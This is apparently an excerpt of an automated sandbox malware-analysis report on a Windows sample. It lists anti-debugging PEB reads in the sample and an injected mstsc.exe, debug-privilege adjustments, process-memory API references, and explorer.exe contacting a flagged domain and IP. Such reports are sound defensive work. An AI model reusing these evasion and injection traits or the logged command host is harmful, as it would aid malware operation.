          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05058D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0500A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05003540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05038DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05051074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05042073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05058CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_050414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0505070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0505070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0501FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0504131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05058B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05058F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0503D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0504138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05055BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_050053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_050053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0503FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05014257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0503B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_0503B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_05058A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.safifinancial.info
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          .NET source code references suspicious native API functions
          Source: Ms5nQdSz5l.exe, Memory.cs | Reference to suspicious API methods: ('WriteProcessMemory', 'WriteProcessMemory@kernel32.dll'), ('ReadProcessMemory', 'ReadProcessMemory@kernel32.dll')
